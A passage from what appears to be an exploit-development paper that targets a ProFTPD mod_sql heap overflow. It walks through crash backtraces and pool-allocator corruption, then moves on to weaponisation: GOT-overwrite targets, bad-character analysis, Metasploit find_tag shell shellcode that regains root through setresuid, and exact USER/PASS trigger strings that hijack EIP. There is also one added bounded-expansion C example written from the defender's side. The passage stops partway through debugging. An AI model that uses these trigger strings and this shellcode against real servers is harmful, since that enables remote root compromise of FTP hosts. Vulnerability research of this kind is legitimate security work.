------[ 3.3.2 - 2813d637d735be610a460a75db061f6b backtrace ]

# cat bt_frames.16259.0
EIP: 0x08054b7d, EBP: 0xbfd0a1d8, destroy_pool
EIP: 0x08054b0c, EBP: 0xbfd0a1e8, clear_pool
EIP: 0x08054bd1, EBP: 0xbfd0a1f8, destroy_pool
EIP: 0x0807389f, EBP: 0xbfd0a248, pr_auth_getpwnam
EIP: 0x080a0e3a, EBP: 0xbfd0a488, setup_env
EIP: 0x080a51ca, EBP: 0xbfd0a4d8, auth_pass
EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
EIP: 0x0804caba, EBP: 0xbfd0a5d8, pr_cmd_dispatch
EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
EIP: 0x08053109, EBP: 0xbfd0aea8, main
EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
EIP: 0x0804b841, EBP: 0x00000000, _start
# cat regs.16259.0
EAX: 0x62413362
EBX: 0x0000b25d
ECX: 0x00000002
EDX: 0x0882f8e8
ESI: 0x080d4960
EDI: 0x088161e8
EBP: 0xbfd0a1d8
ESP: 0xbfd0a1d0
EIP: 0x08054b7d

EAX looks like a modified pointer, and we can see we're in the
destroy_pool / clear_pool code. No arbitrary EIP yet :~(

(gdb) l *0x08054b7d
0x8054b7d is in destroy_pool (pool.c:415).
410         return;
411
412       pr_alarms_block();
413
414       if (p->parent) {
415         if (p->parent->sub_pools == p)
416           p->parent->sub_pools = p->sub_next;
417
418         if (p->sub_prev)
419           p->sub_prev->sub_next = p->sub_next;

(gdb) l * 0x08054b0c
0x8054b0c is in clear_pool (pool.c:395).
390       /* Run through any cleanups. */
391       run_cleanups(p->cleanups);
392       p->cleanups = NULL;
393
394       /* Destroy subpools. */
395       while (p->sub_pools)
396         destroy_pool(p->sub_pools);
397       p->sub_pools = NULL;
398
399       free_blocks(p->first->h.next);

So, we can see that we've corrupted the p->parent->sub_pools pointer. Not 
immediately interesting, as we've isolated what appears to be very 
interesting earlier on. Might be able to do some fun and games at some 
point with the old unlink() style, though.

------[ 3.3.3 - 3d10e2a054d8124ab4de5b588c592830 backtrace ]

# cat bt_frames.99758.0

EIP: 0x08054b7d, EBP: 0xbfd0a338, destroy_pool
EIP: 0x08054b0c, EBP: 0xbfd0a348, clear_pool
EIP: 0x08054bd1, EBP: 0xbfd0a358, destroy_pool
EIP: 0x08074a37, EBP: 0xbfd0a408, pr_auth_getgroups
EIP: 0x08074a98, EBP: 0xbfd0a438, auth_anonymous_group
EIP: 0x08074ea7, EBP: 0xbfd0a478, pr_auth_get_anon_config
EIP: 0x080a4b5c, EBP: 0xbfd0a4d8, auth_user
EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
EIP: 0x0804caba, EBP: 0xbfd0a5d8, pr_cmd_dispatch
EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
EIP: 0x08053109, EBP: 0xbfd0aea8, main
EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
EIP: 0x0804b841, EBP: 0x00000000, _start
# cat regs.99758.0
EAX: 0x62413362
EBX: 0x0882d4ac
ECX: 0x00000002
EDX: 0x088356c8
ESI: 0x080d4960
EDI: 0x088161e8
EBP: 0xbfd0a338
ESP: 0xbfd0a330
EIP: 0x08054b7d

Unfortunately, EIP is the same as the 2813d637d735be610a460a75db061f6b
backtrace, except it dies with pr_auth_getgroups in the backtrace, rather 
than pr_auth_getpwnam.

------[ 3.3.4 - 844319188798d7742af43d10f6541a61 backtrace ]

# cat bt_frames.103331.0
EIP: 0x08054b7d, EBP: 0xbfd0a368, destroy_pool
EIP: 0x08054b0c, EBP: 0xbfd0a378, clear_pool
EIP: 0x08054bd1, EBP: 0xbfd0a388, destroy_pool
EIP: 0x08074a37, EBP: 0xbfd0a438, pr_auth_getgroups
EIP: 0x08074a98, EBP: 0xbfd0a468, auth_anonymous_group
EIP: 0x08074ea7, EBP: 0xbfd0a4a8, pr_auth_get_anon_config
EIP: 0x080c5691, EBP: 0xbfd0a4d8, sql_pre_pass
EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
EIP: 0x0804c9bb, EBP: 0xbfd0a5d8, pr_cmd_dispatch
EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
EIP: 0x08053109, EBP: 0xbfd0aea8, main
EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
EIP: 0x0804b841, EBP: 0x00000000, _start
# cat regs.103331.0
EAX: 0x62413362
EBX: 0x0000a2f3
ECX: 0x00000002
EDX: 0x0882f2b8
ESI: 0x080d4960
EDI: 0x088161e8
EBP: 0xbfd0a368
ESP: 0xbfd0a360
EIP: 0x08054b7d

Not that interesting, unfortunately. 

------[ 3.3.5 - 914b175392625fe75c2b16dc18bfb250 backtrace ]

# cat bt_frames.98014.0
EIP: 0x080544e0, EBP: 0xbfd0a368, free_blocks
EIP: 0x08054b30, EBP: 0xbfd0a378, clear_pool
EIP: 0x08054bd1, EBP: 0xbfd0a388, destroy_pool
EIP: 0x08074a37, EBP: 0xbfd0a438, pr_auth_getgroups
EIP: 0x08074a98, EBP: 0xbfd0a468, auth_anonymous_group
EIP: 0x08074ea7, EBP: 0xbfd0a4a8, pr_auth_get_anon_config
EIP: 0x080c5691, EBP: 0xbfd0a4d8, sql_pre_pass
EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
EIP: 0x0804c9bb, EBP: 0xbfd0a5d8, pr_cmd_dispatch
EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
EIP: 0x08053109, EBP: 0xbfd0aea8, main
EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
EIP: 0x0804b841, EBP: 0x00000000, _start
# cat regs.98014.0
EAX: 0x33614132
EBX: 0x00009bd9
ECX: 0x00000002
EDX: 0x0882ea84
ESI: 0x080d4960
EDI: 0x088161e8
EBP: 0xbfd0a368
ESP: 0xbfd0a350
EIP: 0x080544e0

EAX contains a corrupted value.

Looking at it further:

This GDB was configured as "i486-linux-gnu"...
(gdb) l *0x080544e0
0x80544e0 is in free_blocks (pool.c:138).
133
134       block_freelist = blok;
135
136       /* Adjust first_avail pointers */
137
138       while (blok->h.next) {
139         chk_on_blk_list(blok, old_free_list);
140         blok->h.first_avail = (char *) (blok + 1);
141         blok = blok->h.next;
142       }

This is semi-interesting, as we can overwrite something to point to the end
of the block (the start of the allocated usable memory). However, the
blok = blok->h.next loop makes things a lot trickier than we'd like
(finding a suitable pointer that terminates the loop without crashing,
etc.)

Moving on...

------[ 3.3.6 - b975726b4537662f3f5ddf377ea26c20 backtrace ]

# cat bt_frames.1575.0
EIP: 0x080544e0, EBP: 0xbfd0a338, free_blocks
EIP: 0x08054b30, EBP: 0xbfd0a348, clear_pool
EIP: 0x08054bd1, EBP: 0xbfd0a358, destroy_pool
EIP: 0x08074a37, EBP: 0xbfd0a408, pr_auth_getgroups
EIP: 0x08074a98, EBP: 0xbfd0a438, auth_anonymous_group
EIP: 0x08074ea7, EBP: 0xbfd0a478, pr_auth_get_anon_config
EIP: 0x080a4b5c, EBP: 0xbfd0a4d8, auth_user
EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
EIP: 0x0804caba, EBP: 0xbfd0a5d8, pr_cmd_dispatch
EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
EIP: 0x08053109, EBP: 0xbfd0aea8, main
EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
EIP: 0x0804b841, EBP: 0x00000000, _start
# cat regs.1575.0
EAX: 0x33614132
EBX: 0x0882d29c
ECX: 0x00000002
EDX: 0x088398a4
ESI: 0x080d4960
EDI: 0x088161e8
EBP: 0xbfd0a338
ESP: 0xbfd0a320
EIP: 0x080544e0

This is a duplicate of the previous one..

------[ 3.3.7 - ccbbd918ad0dbc7a869184dc2eb9cc50 backtrace ]

# cat bt_frames.1081.0 
EIP: 0x080544e0, EBP: 0xbfd0a318, free_blocks
EIP: 0x08054b30, EBP: 0xbfd0a328, clear_pool
EIP: 0x08054bd1, EBP: 0xbfd0a338, destroy_pool
EIP: 0x08054b0c, EBP: 0xbfd0a348, clear_pool
EIP: 0x08054bd1, EBP: 0xbfd0a358, destroy_pool
EIP: 0x08074a37, EBP: 0xbfd0a408, pr_auth_getgroups
EIP: 0x08074a98, EBP: 0xbfd0a438, auth_anonymous_group
EIP: 0x08074ea7, EBP: 0xbfd0a478, pr_auth_get_anon_config
EIP: 0x080a4b5c, EBP: 0xbfd0a4d8, auth_user
EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
EIP: 0x0804caba, EBP: 0xbfd0a5d8, pr_cmd_dispatch
EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
EIP: 0x08053109, EBP: 0xbfd0aea8, main
EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
EIP: 0x0804b841, EBP: 0x00000000, _start
# cat regs.1081.0
EAX: 0x33614132
EBX: 0x0882d29c
ECX: 0x00000002
EDX: 0x08839484
ESI: 0x080d4960
EDI: 0x088161e8
EBP: 0xbfd0a318
ESP: 0xbfd0a300
EIP: 0x080544e0

Another duplicate :(

------[ 3.3.8 - f1bfd5428c97b9d68a4beb6fb8286b70 backtrace ] 

# cat bt_frames.11512.0
EIP: 0xb7b7e67a, EBP: 0xbfd0a118, memset
EIP: 0x080c2520, EBP: 0xbfd0a148, _sql_make_cmd
EIP: 0x080c4344, EBP: 0xbfd0a1f8, _sql_getpasswd
EIP: 0x080c514d, EBP: 0xbfd0a2d8, _sql_getgroups
EIP: 0x080ca70e, EBP: 0xbfd0a308, cmd_getgroups
EIP: 0x080718a6, EBP: 0xbfd0a328, call_module
EIP: 0x0807339e, EBP: 0xbfd0a358, dispatch_auth
EIP: 0x0807481d, EBP: 0xbfd0a408, pr_auth_getgroups
EIP: 0x08074a98, EBP: 0xbfd0a438, auth_anonymous_group
EIP: 0x08074ea7, EBP: 0xbfd0a478, pr_auth_get_anon_config
EIP: 0x080a4b5c, EBP: 0xbfd0a4d8, auth_user
EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
EIP: 0x0804caba, EBP: 0xbfd0a5d8, pr_cmd_dispatch
EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
EIP: 0x08053109, EBP: 0xbfd0aea8, main
EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
EIP: 0x0804b841, EBP: 0x00000000, _start
# cat regs.11512.0
EAX: 0x00000000
EBX: 0x0882da74
ECX: 0x00000024
EDX: 0x00000001
ESI: 0x080d4960
EDI: 0x41346141
EBP: 0xbfd0a118
ESP: 0xbfd0a0e8
EIP: 0xb7b7e67a

EDI is a pointer we control. Looking at it further:

(gdb) l *0x080c2520
0x80c2520 is in _sql_make_cmd (mod_sql.c:350).
345       register unsigned int i = 0;
346       pool *newpool = NULL;
347       cmd_rec *cmd = NULL;
348       va_list args;
349
350       newpool = make_sub_pool(p);
351       cmd = pcalloc(newpool, sizeof(cmd_rec));
352       cmd->argc = argc;
353       cmd->stash_index = -1;
354       cmd->pool = newpool;
(gdb)
355
356       cmd->argv = pcalloc(newpool, sizeof(void *) * (argc + 1));
357       cmd->tmp_pool = newpool;
358       cmd->server = main_server;
359
360       va_start(args, argc);
361
362       for (i = 0; i < argc; i++)
363         cmd->argv[i] = (void *) va_arg(args, char *);
364
(gdb)
365       va_end(args);
366
367       cmd->argv[argc] = NULL;
368
369       return cmd;
370     }
371
372     static int check_response(modret_t *mr) {
373       if (!MODRET_ISERROR(mr))
374         return 0;

Interesting, it's in the make_sub_pool() code. Looking at it further:

---
struct pool *make_sub_pool(struct pool *p) {
  union block_hdr *blok;
  pool *new_pool;

  pr_alarms_block();

  blok = new_block(0, FALSE);

  new_pool = (pool *) blok->h.first_avail;
  blok->h.first_avail += POOL_HDR_BYTES;

  memset(new_pool, 0, sizeof(struct pool));
  new_pool->free_first_avail = blok->h.first_avail;
  new_pool->first = new_pool->last = blok;

  if (p) {
    new_pool->parent = p;
    new_pool->sub_next = p->sub_pools;

    if (new_pool->sub_next)
      new_pool->sub_next->sub_prev = new_pool;

    p->sub_pools = new_pool;
  }

  pr_alarms_unblock();

  return new_pool;
}
---

So, if we got it returning an arbitrary pointer, allocations from this
pool (if within the default pool size) will overwrite memory we
control.. let's see what that could be (include/dirtree.h):

---
typedef struct cmd_struc {
  pool *pool;
  server_rec *server;
  config_rec *config;
  pool *tmp_pool;               /* Temporary pool which only exists
                                 * while the cmd's handler is running
                                 */
  int argc;

  char *arg;                    /* entire argument (excluding command) */
  char **argv;
  char *group;                  /* Command grouping */

  int  class;                   /* The command class */
  int  stash_index;             /* hack to speed up symbol hashing in
                                 * modules.c */
  pr_table_t *notes;            /* Private data for passing/retaining
                                 * between handlers */
} cmd_rec;
---

Hmm, so we could overwrite pointers with somewhat controllable contents
(don't forget the SELECT .. FROM .. WHERE type stuff interfering..)

------[ 3.3.9 - Summary ]

Out of the backtraces it has generated, the following look most useful (in 
usefulness looking order :p):

- 11380f2c8ce44d29b93b9bc6308692ae
- f1bfd5428c97b9d68a4beb6fb8286b70
- 914b175392625fe75c2b16dc18bfb250

Considering the code path taken, the first is the most easily exploitable.
Unfortunately, we haven't got a clean EIP overwrite, and instead require
returning a suitable pointer that will trash stuff nearby... depending
on exploitation avenue, this may make things rather complicated.

--[ 3.4 - Exploitation avenues ]

So far, we've found an approach that allows us to return a pointer to be
used later on where data we control is used in conjunction with other data. 

What can we do with that? There's a couple of possibilities:

- Work out how to indicate authentication has succeeded
  - Should leave us with the ftpd with nobody (revertable to root) 
    privileges, and access to /. That'd be pretty neat ;D
  - If we munge the heap too much, however, it may crash. Depending on 
    what's being overwritten etc, it may be unavoidable.

- Run our own shellcode 
  - We can revert to root with a setresuid() call.
  - More anti-forensically acceptable / less effort / etc :p

------[ 3.4.1 - Shellcode approach ] 

By returning a pointer that leads us to overwrite a function pointer with
our contents, we can run shellcode. All that's required is a single
address. Let's say, for argument's sake, we use

USER ...SHELLCODE%m%a..<POINTER TO RETURN><OVERWRITE CONTENT>

We would overwrite the function pointer with a pointer to shellcode (our
original pointer - X bytes to hit it). If we need to brute force a target 
pointer to overwrite, we can probably repeat <OVERWRITE CONTENT> several 
times to cover more memory than normal.

Due to space considerations, it would be best to use a find sock / recv()
tag shellcode as a stager, then send another payload later on.

If shellcode size is a problem, it would be possible to spray our shellcode
across the heap in the fake auth attempt, and use an egg hunter code in the
trigger auth attempt. Ideally we would have a register or stack contents to
give us an idea of where to start in case of ASLR. 

There are perhaps some other techniques that may be possible on certain
configurations, such as inputting the shellcode via reverse DNS, or in the 
ident lookup text. While possible, it's not entirely needed at this point 
in time and wasn't explored further.

Talking about shellcode, we should look at what character restrictions we
have. Obviously, \x0d, \x0a, \x00 would be problematic since FTP is a text
line based protocol. Reading further over the contrib/mod_sql_mysql.c code,
we see that we have several other restrictions, as documented in [8], which
gives us the following bad characters:

\x0d (\r), \x0a (\n), \x00, \x27 ('), \x22 ("), \x08 (\b), \x09 (\t)
\x1b (\Z), \x5c (\\), \x5f (_), \x25 (%)

(That is, assuming we are exploiting ProFTPD getting auth information from
MySQL. If it's getting information from PostgreSQL, then the bad character
restrictions are probably different).

All in all, those restrictions aren't too bad, and some light 
experimentation implies it should be fine to use, as the following pastes 
show:

---
msf payload(shell_find_tag) >  generate -b
"\x00\x27\x22\x08\x0a\x0d\x09\x1B\x5c\x5f" -t c -o PrependSetresuid=true
/*
 * linux/x86/shell_find_tag - 102 bytes
 * http://www.metasploit.com
 * Encoder: x86/fnstenv_mov
 * AppendExit=false, PrependSetresuid=true, TAG=2pDv,
 * PrependSetuid=false, PrependSetreuid=false
 */
unsigned char buf[] =
"\x6a\x14\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x12\x87"
"\xe9\xb7\x83\xeb\xfc\xe2\xf4\x23\x4e\xd8\x6c\xe5\x64\x59\x13"
"\xdf\x07\xd8\x6c\x41\x0e\x0f\xdd\x52\x30\xe3\xe4\x44\xd4\x60"
"\x56\x94\x7c\x8f\x48\x13\xed\x8f\xef\xdf\x07\x68\x89\x20\xf7"
"\xad\xc1\x67\x77\xb6\x3e\xe9\xed\xeb\xee\x78\xb8\xb1\x7a\x92"
"\xce\x90\x4f\x78\x8c\xb1\x2e\x40\xef\xc6\x98\x61\xef\x81\x98"
"\x70\xee\x87\x3e\xf1\xd5\xba\x3e\xf3\x4a\x69\xb7";

...

msf payload(find_tag) > use payload/linux/x86/shell/find_tag
msf payload(find_tag) > generate -b
"\x00\x27\x22\x08\x0a\x0d\x09\x1B\x5c\x5f" -t c -o PrependSetresuid=true
/*
 * linux/x86/shell/find_tag - 74 bytes (stage 1)
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * AppendExit=false, PrependSetresuid=true, TAG=qvkV,
 * PrependSetuid=false, PrependSetreuid=false
 */
unsigned char buf[] =
"\x31\xc9\xbf\xd3\xde\x9e\x99\xdb\xc9\xd9\x74\x24\xf4\x5b\xb1"
"\x0c\x83\xc3\x04\x31\x7b\x0f\x03\x7b\x0f\xe2\x26\xef\x57\xa8"
"\x13\xe7\x8b\x7b\x07\xc5\xcc\x4d\x9c\x85\x45\x4b\x48\x6a\xe1"
"\x9e\xdf\x3c\x5e\x16\x3e\x46\x9b\x4e\x3f\x46\x36\xe9\xe7\x84"
"\x46\x74\x29\x66\x31\x1c\x03\xfd\x4d\xbd\x57\x50\x52\xa4";

/*
 * linux/x86/shell/find_tag - 36 bytes (stage 2)
 * http://www.metasploit.com
 */
unsigned char buf[] =
"\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b"
"\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x52\x53\x89\xe1\xcd\x80";
---

We can note down that we require 74 bytes or so for the shellcode.

If character encoding is enabled in ProFTPD (via mod_lang), this may incur 
further restrictions in characters we can use, or alternatively require 
decoding our payload, so that when it's encoded, it is correct. If 
possible/suitable, that is :p

If the pointers we are after contain a bad character, we're in a little bit
of trouble :|

------[ 3.4.2 - Data manipulation ]

There are plenty of global variables that can be modified in ProFTPD, that 
can/may be useful for data manipulation. 

grep'ing the src/ directory for "authenticated" shows some interesting 
code:

---
static void shutdown_exit(void *d1, void *d2, void *d3, void *d4) {
  if (check_shutmsg(&shut, &deny, &disc, shutmsg, sizeof(shutmsg)) == 1) {
    char *user;
    time_t now;
    char *msg;
    const char *serveraddress;
    config_rec *c = NULL;
    unsigned char *authenticated = get_param_ptr(main_server->conf,
      "authenticated", FALSE);

...
      if (c->requires_auth && cmd_auth_chk && !cmd_auth_chk(cmd))
        return -1;

... (cmd_auth_chk being a .bss function pointer)
      cmdargstr = make_arg_str(cmd->tmp_pool, cmd->argc, cmd->argv);

      if (cmd_type == CMD) {

        /* The client has successfully authenticated... */
        if (session.user) {
          char *args = strchr(cmdargstr, ' ');

          pr_scoreboard_entry_update(session.pid,
            PR_SCORE_CMD, "%s", cmd->argv[0], NULL, NULL);
          pr_scoreboard_entry_update(session.pid,
            PR_SCORE_CMD_ARG, "%s", args ?
              pr_fs_decode_path(cmd->tmp_pool, (args+1)) : "", NULL, NULL);

          pr_proctitle_set("%s - %s: %s", session.user, session.proc_prefix,
            cmdargstr);

        /* ...else the client has not yet authenticated */
        } else {
          pr_proctitle_set("%s:%d: %s", session.c->remote_addr ?
            pr_netaddr_get_ipstr(session.c->remote_addr) : "?",
            session.c->remote_port ? session.c->remote_port : 0, cmdargstr);
        }
      }
---

in modules/mod_auth.c:

---
/* auth_cmd_chk_cb() is hooked into the main server's auth_hook function,
 * so that we can deny all commands until authentication is complete.
 */
static int auth_cmd_chk_cb(cmd_rec *cmd) {
  unsigned char *authenticated = get_param_ptr(cmd->server->conf,
    "authenticated", FALSE);

  if (!authenticated || *authenticated == FALSE) {
    pr_response_send(R_530, _("Please login with USER and PASS"));
    return FALSE;
  }

  return TRUE;
}
---

The authenticated configuration directive is set:

---
    c = add_config_param_set(&cmd->server->conf, "authenticated", 1, NULL);
    c->argv[0] = pcalloc(c->pool, sizeof(unsigned char));
    *((unsigned char *) c->argv[0]) = TRUE;
---

It seems a little complicated to call due to other code around it..  but
it'd probably be possible with a bit of effort if the stack wasn't
randomized, or maybe via some other approaches.  That said, the author
isn't going to spend much time looking at it. One last thought on the
matter:

---
  /* By default, enable auth checking */
  set_auth_check(auth_cmd_chk_cb);
---

If authentication is bypassed, but setresuid() is not callable (via NX, or 
whatever), then there is a slight restriction of the user id it has by 
default:

# cat /proc/19840/status
Name:   proftpd
State:  T (tracing stop)
Tgid:   19840
Pid:    19840
PPid:   19830
TracerPid:      19846
Uid:    0       65534   0       65534
Gid:    65534   65534   65534   65534
FDSize: 32
Groups: 65534
...
CapInh: 0000000000000000
CapPrm: ffffffffffffffff
CapEff: 0000000000000000
CapBnd: ffffffffffffffff

UID/GID list in real, effective, saved, fsuid format. Without reverting
privileges, it limits what we can do. That said, it allows for a lot of
information leaking if the directory permissions aren't too strict / ACLs
aren't too strict.

--[ 4 - Writing an exploit ] 

Before writing an exploit, we should quickly review what we have found out 
before:

- Variable substitution allows us to expand past the allocated 4096 bytes
  - %m/%r duplicates our input
  - %a gives us our IP address
  - %f gives us -
  - %T gives us 0.0
  - %Z gives us {UNKNOWN TAG}
  - %l gives us UNKNOWN if ident checking is disabled (default).. we'll use
    it even though it's not ideal (ident could be enabled, and if the box
    where the exploit is run from is running ident, it could affect the
    ProFTPD heap layout more).

%a isn't all that good for a remote exploit, as the byte count can differ
(attacking from 1.2.3.4 vs 136.246.139.246). We'll try excluding that for
now, although it's useful for consuming small chunks :|

In order to exploit this vulnerability, we can re-use some of our existing 
code to find the input strings needed against new targets when we can 
replicate a target environment.
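
The first point of the review above, seen from the fixing side. This is an
added example (not ProFTPD's code and not part of the original paper) of tag
expansion that enforces the 4096-byte bound on the expanded output at every
append. The function names, the "USER x" request text and the modelling of
%m/%r as a caller-supplied string are assumptions; the tag values are the
ones listed above.

```c
#include <stdio.h>
#include <string.h>

#define SQL_BUF_SIZE 4096   /* the allocation size the text refers to */

/* Expansions as the text lists them; %m/%r are modelled as the request text
 * supplied by the caller (an assumption of this example). */
static const char *tag_value(char tag, const char *request) {
  switch (tag) {
  case 'm': case 'r': return request;
  case 'f': return "-";
  case 'T': return "0.0";
  case 'Z': return "{UNKNOWN TAG}";
  case 'l': return "UNKNOWN";
  default:  return NULL;            /* anything else is copied literally */
  }
}

/* Append n bytes at out[*used], always leaving room for the terminating NUL. */
static int append_bounded(char *out, size_t cap, size_t *used,
                          const char *src, size_t n) {
  if (n >= cap - *used)
    return -1;
  memcpy(out + *used, src, n);
  *used += n;
  out[*used] = '\0';
  return 0;
}

/* Expand tags from `in` into out[cap]. Returns the expanded length, or -1 when
 * the result would not fit. The bound is enforced on every append, i.e. on the
 * expanded size, not on the length of the input string. */
static long expand_tags_bounded(const char *in, const char *request,
                                char *out, size_t cap) {
  size_t used = 0;
  if (cap == 0)
    return -1;
  out[0] = '\0';
  for (const char *p = in; *p; p++) {
    const char *val = (p[0] == '%') ? tag_value(p[1], request) : NULL;
    if (val) {
      if (append_bounded(out, cap, &used, val, strlen(val)) < 0)
        return -1;
      p++;                          /* consume the tag letter as well */
    } else if (append_bounded(out, cap, &used, p, 1) < 0) {
      return -1;
    }
  }
  return (long)used;
}

/* Constructed input: `count` copies of "%Z" (2 bytes in, 13 bytes out each).
 * Returns the expansion result, or -2 if count is out of range or a byte
 * past the destination buffer was touched. */
static long expand_repeated_tag(int count) {
  static char in[2048];
  struct { char buf[SQL_BUF_SIZE]; char canary[8]; } dst;
  if (count < 0 || (size_t)count * 2 >= sizeof(in))
    return -2;
  for (int i = 0; i < count; i++)
    memcpy(in + 2 * i, "%Z", 2);
  in[2 * count] = '\0';
  memset(dst.canary, 0x5a, sizeof(dst.canary));
  long n = expand_tags_bounded(in, "USER x", dst.buf, sizeof(dst.buf));
  for (size_t i = 0; i < sizeof(dst.canary); i++)
    if (dst.canary[i] != 0x5a)
      return -2;
  return n;
}

int main(void) {
  char out[64];
  long n = expand_tags_bounded("A%f%T%Z", "USER x", out, sizeof(out));
  printf("%ld \"%s\"\n", n, out);
  printf("315 tags -> %ld, 316 tags -> %ld\n",
         expand_repeated_tag(315), expand_repeated_tag(316));
  return 0;
}
```

A 632-byte input of 316 tags is well under 4096 bytes yet expands to 4108,
which is why a check on the input length alone does not help.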

------[ 4.1 - Exploitation via arbitrary pointer return ] 

So, let's see, what do we need to do?

- Find a suitable trigger string that allows us, say:
  - 16 byte overwrite (since our offset is 12 for first_avail pointer)
  - 74 bytes of shellcode. Should be plenty of space, and enough to do 
    interesting things with.

- Find a suitable target. For the most part, the GOT seems a good
  target, though this may be reassessed later on.
  - Ideally you'd want to use a libc function that will be used next.
    Due to the style of attack we're using, if it uses another libc 
    function, we may overwrite it with crap (crap being stuff like table
    entries / names / our expanded string) :(

After some experimentation, I came up with the following input strings to 
trigger the vulnerability with a suitable call tree:

- USER %T%m%Z%m%T%l%m%f%l%m%lA%T%m%f%f%l%m%m%T%m%f%m%m%m%mA%m%f%f%l%m%TA%m%
m%f%l%TA%fA%l%Z%fA%T%T%l%f%l%f%f%Z%l%m%Z%f%l%T%f%Z%fAAA%Z%l%m%fA%l%m%TA%ZA%
f%lAA%f%m%Z%Z%Z%T%Z%f%m%Z%l%fA%Z
- PASS invalid
- USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA%T%f%TA%Z%m%Z%mA%m%ZA%Z%l%mA%T%mA%T%m%f%ZA%m%f%m%Z%m%T%m%T%m%f%fA%ZA%
m%T%m%m%Z%T%m%Z%lA%T%l%l%T%f%Z%m%f%f%T%f%Z%l%m%TA%mAa0Aa1Aa2Aa3Aa4A

And we have a crash writing to 0x41346141 ;)

With that info in hand, we can start writing the exploit.. let's find a 
target to overwrite.. From glancing over the back traces, it looks like 
mysql_real_query() is a suitable target.

080e81a8 R_386_JUMP_SLOT   mysql_real_query

Plugging that in, and we get:

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb7c7a6b0 (LWP 12830)]
0x41414141 in ?? ()
(gdb) bt
#0  0x41414141 in ?? ()
#1  0x080c0ea1 in cmd_select (cmd=0x98ae7ec) at mod_sql_mysql.c:838

Well, that's good. Not entirely what I was expecting though. Looking at the
backtrace, we see it's calling time(NULL), so let's see:

080e8218 R_386_JUMP_SLOT   time

4187    int sql_log(int level, const char *fmt, ...) {
4188      char buf[PR_TUNABLE_BUFFER_SIZE] = {'\0'};
4189      time_t timestamp = time(NULL);
4190      struct tm *t = NULL;
4191      va_list msg;

So, it looks like time is a better target. Updating our exploit:

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb7c7a6b0 (LWP 12923)]
0x72657375 in ?? ()
(gdb)

That looks better (>>> "72657375".decode('hex') -> 'resu')

(gdb) x/s 0x080e8218
0x80e8218 <_GLOBAL_OFFSET_TABLE_+548>:   "userid, passwd, uid, gid,
homedir, shell FROM ftpuser WHERE (userid='", 'A' <repeats 74 times>,
"0.0-0.0A{UNKNOWN TAG}", 'A' <repeats 36 times>...

Looking further

(gdb) call strlen(0x080e8218)
$1 = 4155
(gdb) x/s 0x080e8218+4155-128
0x80e91d3 <scoreboard_file+2963>:
"%Z%m%Z%mA%m%ZA%Z%l%mA%T%mA%T%m%f%ZA%m%f%m%Z%m%T%m%T%m%f%fA%ZA%m%T%m%m%Z%T%
m%Z%lA%T%l%l%T%f%Z%m%f%f%T%f%Z%l%m%TA%mAa0Aa1Aa2Aa3\030\202\016"
(gdb) x/40x 0x080e8218+4155-64
